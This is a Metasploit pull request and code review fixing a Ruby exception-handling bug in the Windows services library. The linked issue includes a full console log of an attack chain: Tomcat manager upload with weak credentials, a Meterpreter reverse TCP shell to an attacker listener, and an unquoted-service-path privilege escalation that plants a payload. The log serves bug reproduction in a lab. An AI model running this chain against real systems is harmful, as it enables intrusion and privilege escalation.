### PR TITLE
Fix error when service is already running and update exception documentation in lib/msf/core/post/windows/services.rb

### LINKED ISSUE #16603: Unquote_service_path module fails. Cause : post/windows/services.rb raises an Integer
exploit/windows/local/unquoted_service_path module fails since lib/msf/core/post/windows/services.rb tries to raises an Integer

## Steps to reproduce

How'd you do it?

1. I start a Windows server 2019 on AWS
2. I created a Tomcat account and a Tomcat instance listening on 8080
3. I created a dummy service (unquoted)
4. I tried to use exploit/windows/local/unquoted_service_path module without success

## Expected behavior

Getting nt authority\system

## Current behavior

```
msf6 > use multi/http/tomcat_mgr_upload
msf6 exploit(multi/http/tomcat_mgr_upload)> set httpPassword tomcat
msf6 exploit(multi/http/tomcat_mgr_upload)> set httpUsername manager
msf6 exploit(multi/http/tomcat_mgr_upload)> set RHOSTS 172.31.44.216
msf6 exploit(multi/http/tomcat_mgr_upload)> set RPORT 8080
msf6 exploit(multi/http/tomcat_mgr_upload)> set TARGET "Windows Universal"
msf6 exploit(multi/http/tomcat_mgr_upload)> set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/http/tomcat_mgr_upload)>  run

[*] Started reverse TCP handler on 172.31.23.92:4444 
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying jKRJZvcs64EG9j4UCLgsyk0T...
[*] Executing jKRJZvcs64EG9j4UCLgsyk0T...
[*] Undeploying jKRJZvcs64EG9j4UCLgsyk0T ...
[*] Sending stage (175174 bytes) to 172.31.44.216
[*] Undeployed at /manager/html/undeploy
[*] Meterpreter session 1 opened (172.31.23.92:4444 -> 172.31.44.216:61618) at 2022-05-20 20:05:41 +0000

meterpreter > bg
[*] Backgrounding session 1...

msf6 exploit(multi/http/tomcat_mgr_upload) > use exploit/windows/local/unquoted_service_path
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/unquoted_service_path) > set VERBOSE true
VERBOSE => true
msf6 exploit(windows/local/unquoted_service_path) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/unquoted_service_path) > run

[*] Started reverse TCP handler on 172.31.23.92:4444 
[*] Finding a vulnerable service...
[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
[-] Request Error extapi_service_query: Operation failed: Access is denied. falling back to registry technique
[+] Found vulnerable service: My Service (ping) - C:\Program Files\MyApp\My Programs\My Binaries\MyService.exe (LocalSystem)
[*] Attempting exploitation of My Service (ping)
[*] Enumerating vulnerable paths
[*] Checking writability to: C:\Program Files\MyApp\My Programs
[+] Path is writable
[*] Placing C:\Program Files\MyApp\My Programs\My.exe for My Service (ping)
[*] Attempting to write 15872 bytes to C:\Program Files\MyApp\My Programs\My.exe...
[+] Manual cleanup of C:\Program Files\MyApp\My Programs\My.exe is required due to a potential reboot for exploitation.
[+] Successfully wrote payload
[*] Launching service My Service (ping)...
[*] Manual cleanup of the payload file is required. My Service (ping) will fail to start as long as the payload remains on disk.
[-] Exploit failed: TypeError exception class/object expected
```

https://github.com/rapid7/metasploit-framework/blob/20198a2ff5b7939f97ab1952b59d899409dd6fdb/lib/msf/core/post/windows/services.rb#L423-L431

`service_start` returns an integer in all cases. In my case, when the service is already running (Error::SERVICE_ALREADY_RUNNING), I got : 
`retval = {"GetLastError"=>1056, "ErrorMessage"=>"FormatMessage failed to retrieve the error.", "return"=>false}`

It returns 1056 and : https://github.com/rapid7/metasploit-framework/blob/20198a2ff5b7939f97ab1952b59d899409dd6fdb/lib/msf/core/post/windows/services.rb#L517-L551

`raise status` fails since it tries to raise an Integer.

### Metasploit version

Framework Version: 6.1.41-dev

### PR DESCRIPTION
**Pull request by kalidor**
Fixes #16603 

https://github.com/rapid7/metasploit-framework/blob/20198a2ff5b7939f97ab1952b59d899409dd6fdb/lib/msf/core/post/windows/services.rb#L517-L564

https://github.com/rapid7/metasploit-framework/blob/20198a2ff5b7939f97ab1952b59d899409dd6fdb/lib/msf/core/post/windows/services.rb#L423-L431

`service_start()` function should return Error::SERVICE_ALREADY_RUNNING as string or raise Error::SERVICE_ALREADY_RUNNING, to get catch by `rescue RuntimeError => s` block and don't raise an error.

I suppose raising an error is better, since the function will keep returning only Integer.

### CODE REVIEW

File: lib/msf/core/post/windows/services.rb [hunk 1]
```diff
@@ -424,6 +424,9 @@ def service_start(name, server=nil)
     open_sc_manager(:host=>server, :access=>"SC_MANAGER_CONNECT") do |manager|
       open_service_handle(manager, name, "SERVICE_START") do |service_handle|
         retval = advapi32.StartServiceA(service_handle,0,nil)
+        if retval["GetLastError"] == Error::SERVICE_ALREADY_RUNNING
+          raise Error::SERVICE_ALREADY_RUNNING.to_s
+        end
```
Comment (smcintyre-r7) [inline lib/msf/core/post/windows/services.rb:429]: It looks like this return value check should be handled in `#restart_service` instead of being here. This method, according to the docs raises the `RuntimeError` "if OpenServiceA failed", not if the service is already running. `#restart_service` is also equipped already to catch and handle the exception you're trying to raise so it seems like a good place to include that logic. You'd do something to the effect of:

```
     status = service_start(name, server) 
     if status == Error::SUCCESS 
       vprint_good("[#{name}] Service started") 
       return true 
     elsif status == Error::SERVICE_ALREADY_RUNNING
       # ... handle it here
```

The documentation for the return value is a little off in the sense that if it's an error (non-zero value) it's actually the result from `GetLastError` versus the enum of 0, 1, 2. We can fix that as a separate issue however.

Comment (gwillcox-r7) [reply lib/msf/core/post/windows/services.rb:429]: Well true but according to https://docs.microsoft.com/en-us/windows/win32/api/winsvc/nf-winsvc-startservicea one can return https://docs.microsoft.com/en-us/windows/win32/api/winsvc/nf-winsvc-startservicea so this is a valid place to check for it since in theory we could be starting a service and then should error out if the service is already started.

Additionally if we just handled this in `restart_services` then what about the case where I would want to start a service vs restarting it? This is already being done in several places such as https://github.com/rapid7/metasploit-framework/blob/5e69de43a8a7332ba135d79132a2884f7c81fe29/modules/exploits/windows/local/cve_2020_17136.rb#L193, https://github.com/rapid7/metasploit-framework/blob/5e69de43a8a7332ba135d79132a2884f7c81fe29/modules/exploits/windows/local/current_user_psexec.rb#L134, and https://github.com/rapid7/metasploit-framework/blob/5e69de43a8a7332ba135d79132a2884f7c81fe29/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb#L202

Therefore we would actually be failing to implement a proper fix to this issue if we went with your proposed route since those modules would end up calling the underlying `service_start` function vs the wrapping `restart_services` function.

Now as to the question of whether or not we should be raising an error, we do already raise a RuntimeError in `service_start` as well so that wouldn't be too beyond the expectations of existing behavior, and realistically these modules should be expected to handle those errors themselves. Unfortunately though, that does not seem to be the case for many of the examples listed above, raising the question as to whether these modules need to be adjusted appropriately.

Comment (gwillcox-r7) [reply lib/msf/core/post/windows/services.rb:429]: Left explanation of my logic on this above but feel free to provide counter arguments etc here, just trying to explain my logic and work together towards an ideal solution 👍

**Review by gwillcox-r7 — CHANGES_REQUESTED** [review]

File: lib/msf/core/post/windows/services.rb [hunk 2]
```diff
@@ -524,7 +524,7 @@ def service_restart(name, start_type=START_TYPE_AUTO, server=nil)
         vprint_good("[#{name}] Service started")
         return true
       else
-        raise status
+        raise status.to_s
```
Comment (gwillcox-r7) [inline lib/msf/core/post/windows/services.rb:527]: Not a bad idea however we should probably also update the documentation a bit before this to reflect this change. So should be like so:

```
#
  # Performs an aggressive service (re)start
  # If service is disabled it will re-enable
  # If service is running it will stop and restart
  #
  # @param name [String] The service name
  # @param start_type [Integer] The start type to configure if disabled
  # @param server [String] The server to target
  #
  # @return [Boolean] indicating success
  #
  #@raise [String] if OpenServiceA failed
  #
```

Comment (kalidor) [reply lib/msf/core/post/windows/services.rb:527]: Are you sure updating this is necessary ? Since, the raise is catch one line below. https://github.com/rapid7/metasploit-framework/blob/be48b1481ad80f79862c91a56bf2c584845b163e/lib/msf/core/post/windows/services.rb#L517-L536
I thought the raise will not exit the `service_restart` function, but maybe I'm wrong...

Comment (gwillcox-r7) [reply lib/msf/core/post/windows/services.rb:527]: Upon further inspection and talking with @smcintyre-r7 it looks like the code for this function may need reworking. Give us a bit and I'll try push up a proper fix for this to avoid the currently janky way of converting between numbers and strings that I think is part of the root cause of this issue.

File: lib/msf/core/post/windows/services.rb (hunk 1 above)
Comment (gwillcox-r7) [reply lib/msf/core/post/windows/services.rb]: The changes from [c94f22c](https://github.com/rapid7/metasploit-framework/pull/16602/commits/c94f22cebe99619380f9794a58d8a6341f2fbeab) should fix this up as after internal discussions we didn't like the fact that we were converting back and forth between a string and integer for only one case of the case.

**Review by gwillcox-r7 — APPROVED** [review]

**Comment by gwillcox-r7** [comment]
This will need a secondary review, but @kalidor if you could confirm these changes work for you, I don't think your current steps provide enough info to fully replicate your issue so I'd appreciate a demo video or similar showcasing that these fixes work for you before I land this.

@bwatters-r7 Any chance you could take a look over this before I land it? Apologies in advance for asking you to take a second look at my PRs this week 😅

**Comment by kalidor** [comment]
Hi, i can confirm those changes work fine. Here are two videos: https://unixed.fr/~gch/msf_service.html. The first one used the actual version of services.rb, the second one uses the updates version of services.rb.

**Comment by gwillcox-r7** [comment]
Alright thanks @kalidor! Videos look good, will land this now.
